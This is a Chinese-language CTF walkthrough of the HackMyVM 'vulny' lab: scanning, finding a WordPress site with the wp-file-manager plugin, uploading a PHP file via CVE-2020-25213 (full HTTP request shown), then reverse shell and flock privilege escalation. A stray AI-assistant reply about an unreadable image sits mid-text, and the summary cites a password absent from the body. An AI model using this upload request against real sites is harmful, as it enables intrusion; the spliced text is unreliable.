hackmyvm-vulny

扫描情况

只开了80端口

[ ]2025/03/09 11:54:49 本次扫描用户屏蔽的端口:[25 110 9100 9101 9102 9103]Tips: 如果要进行暴力破解，可以使用--hydra参数

[+]2025/03/09 11:54:49 当前环境为：windows, 输出编码为：utf-8

[+]2025/03/09 11:54:49 hydra模块已开启，开始监听暴力破解任务[ ]2025/03/09 11:54:49 当前已开启的hydra模块为：[ssh rdp ftp smb telnet mysql mssql oracle postgresql mongodb redis] [+]2025/03/09 11:54:49 成功加载HTTP指纹:[26553]条 [+]2025/03/09 11:54:49 成功加载NMAP探针:[150]个,指纹[11916]条 [ ]2025/03/09 11:54:49 未检测到qqwry.dat,将关闭CDN检测功能，如需开启，请执行kscan --download-qqwry下载该文件[+]2025/03/09 11:54:50 Domain、IP、Port、URL、Hydra引擎已准备就绪

[+]2025/03/09 11:54:50 所有扫描任务已下发完毕http://192.168.69.17        Apache2UbuntuDefaultPage:Itworks FoundDomain:rg、launchpad.net、httpd.a,FingerPrint:Apache2Ubuntu默认页;Perl;Ubuntu;Apache,Digest:FF;nntext-align:c,Length:11155,Port:80

[ ] WebTitle http://192.168.69.17   code:200 len:10918  title:Apache2 Ubuntu Default Page: It works

80端口

80没直接的漏洞，扫描路径发现/secret下有个wp

[11:59:06] Starting: secret/ [11:59:33] 200 -    3KB - /secret/readme.html [11:59:50] 301 -  324B  - /secret/wp-admin  ->  http://192.168.69.17/secret/wp-admin/ [11:59:50] 301 -  326B  - /secret/wp-content  ->  http://192.168.69.17/secret/wp-content/ [11:59:50] 200 -  487B  - /secret/wp-content/uploads/ [11:59:50] 200 -  513B  - /secret/wp-content/ Added to the queue: secret/wp-content/ Added to the queue: secret/wp-admin/ [11:59:50] 301 -  327B  - /secret/wp-includes  ->  http://192.168.69.17/secret/wp-includes/ [11:59:50] 200 -  513B  - /secret/wp-content/?C=D;O=A Added to the queue: secret/wp-content/uploads/ [11:59:51] 200 -  470B  - /secret/wp-content/upgrade/

‍

打开页面发现config有问题，页面显示不正常

访问uploads里，发现有个wp-file-manager的插件

对应的漏洞有好几个：

CVE-2024-7559：

File Manager Pro <= 8.3.7 — 经过身份验证 (Subscriber+) 任意文件上传 (CVE-2024-7559)

但这个没有漏洞exp

CVE-2020-25213：

WordPress插件wp-file-manager任意文件上传漏洞(CVE-2020-25213)

exp如下：

POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 Content-Length: 631 Content-Type: multipart/form-data; boundary=------------------------9689147a5989a801 Connection: close

--------------------------9689147a5989a801 Content-Disposition: form-data; name="reqid"

17457a1fe6959 --------------------------9689147a5989a801 Content-Disposition: form-data; name="cmd"

upload --------------------------9689147a5989a801 Content-Disposition: form-data; name="target"

l1_Lw --------------------------9689147a5989a801 Content-Disposition: form-data; name="mtime[]"

1576045135 --------------------------9689147a5989a801 Content-Disposition: form-data; name="upload[]"; filename="1.php" Content-Type: application/octet-stream

--------------------------9689147a5989a801--

上传成功

反弹shell,python3起tty一条龙。查一查有无suid

有个at，但是是daemon，好像不是目标

pspy看了下定时任务，好像没有，可能要到mysql里找密码

在/etc/wordpress/config-192.168.1.122.php里找到

密码不对，config.php注释里还藏了个字符串，很不起眼

/* idrinksomewater */

成功，读取uset.txt

HMViuploadfiles

尝试提权到root

由于您提供的文本是图像格式，我无法直接提取其中的文字内容。如果您能提供图像中的文字内容，我可以帮助您提取摘要。请将文字内容粘贴到这里，我将为您生成摘要。

flock提权较为简单，直接到root，读取root.txt-HMVididit

总结：

1. 扫描情况：

• 仅开放80端口。
• 用户屏蔽的端口：[25, 110, 9100, 9101, 9102, 9103]。
• 当前环境为Windows，输出编码为UTF-8。
• Hydra模块已开启，支持暴力破解任务，包括SSH、RDP、FTP、SMB、Telnet、MySQL、MSSQL、Oracle、PostgreSQL、MongoDB、Redis。
• 成功加载HTTP指纹和NMAP探针。

2. 80端口发现：

• 发现Apache2 Ubuntu默认页面。
• 扫描路径发现/secret下有一个WordPress（WP）站点。
• 发现wp-file-manager插件，存在多个漏洞。

3. 漏洞利用：

• CVE-2020-25213
  
  ：WordPress插件wp-file-manager存在任意文件上传漏洞。
• 成功上传PHP文件并执行反弹shell。
• 通过flock提权到root，读取root.txt。

4. 数据库信息：

• 在/etc/wordpress/config-192.168.1.122.php中找到数据库配置信息。
• 数据库密码为myfuckingpassword。

5. 提权成功：

• 使用flock成功提权到root，读取root.txt，内容为HMVididit。

关键点：

• 80端口的Apache2 Ubuntu默认页面。
• /secret
  
  路径下的WordPress站点。
• wp-file-manager
  
  插件的任意文件上传漏洞（CVE-2020-25213）。
• 通过反弹shell和flock提权到root。

原文始发于微信公众号（BlueIris）：hackmyvm-vulny